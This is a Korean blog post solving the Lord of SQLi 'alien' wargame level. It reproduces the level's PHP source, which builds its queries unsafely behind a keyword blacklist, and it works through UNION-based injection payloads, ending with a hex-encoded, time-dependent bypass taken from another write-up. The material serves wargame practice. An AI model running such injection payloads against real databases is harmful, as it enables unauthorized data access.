Post

LOS Lv.32 alien (풀이 봄..)

alien



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
query : select id from prob_alien where no=

query2 : select id from prob_alien where no=''

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/admin|and|or|if|coalesce|case|_|\.|prob|time/i', $_GET['no'])) exit("No Hack ~_~");
  $query = "select id from prob_alien where no={$_GET[no]}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $query2 = "select id from prob_alien where no='{$_GET[no]}'";
  echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
  if($_GET['no']){
    $r = mysqli_fetch_array(mysqli_query($db,$query));
    if($r['id'] !== "admin") exit("sandbox1");
    $r = mysqli_fetch_array(mysqli_query($db,$query));
    if($r['id'] === "admin") exit("sandbox2");
    $r = mysqli_fetch_array(mysqli_query($db,$query2));
    if($r['id'] === "admin") exit("sandbox");
    $r = mysqli_fetch_array(mysqli_query($db,$query2));
    if($r['id'] === "admin") solve("alien");
  }
  highlight_file(__FILE__);
?>






Solution



동일한 쿼리에서 admin을 뽑아야 되고 또 뽑으면 안되고.. 이게 무슨 ?

우선 해봄 그냥.


1
query : select id from prob_alien where no=1 && 0 || id=0x61646D696E


입력값을 줬을 때, sandbox1이 뜸. -> id에 admin이 없다.

따라서 admin 값을 줌.


1
query : select id from prob_alien where no=1 && 0 union select 0x61646D696E


그럼 이제 sandbox2가 뜸.

?.. 막막하다..

일단 query2애서도 정상적으로 작동할 수 있도록 쿼리를 짜보면 다음과 같음.
?no=0 union select 0x61646D696E %23' union select 0x61646D696E %23


1
2
3
4
5
query : select id from prob_alien where no=0 union select 0x61646D696E #' union select 0x61646D696E #

query2 : select id from prob_alien where no='0 union select 0x61646D696E #' union select 0x61646D696E #'

sandbox2


걍 풀이 봄..
blog.limelee.xyz/entry/LOS-alien?category=711778


1
2
3
0 union select concat(replace(sleep(1),0,'a'),replace(second(now())%2,0,'dmin'))#' union select insert(@c,instr(@c,'a'),5,@c:='admin') #

?no=0 union select concat(replace(sleep(1),0x30,0x61),replace(second(now())%2,0,0x646d696e))%23' union select insert(@c,instr(@c,'a'),5,@c:=0x61646d696e) %23


phpmyadmin으로 할 때와 wsl로 mysql 접속해서 하는게 결과가 다름.. wsl로 접속해서 하는 법 익혀두기..






This post is licensed under CC BY 4.0 by the author.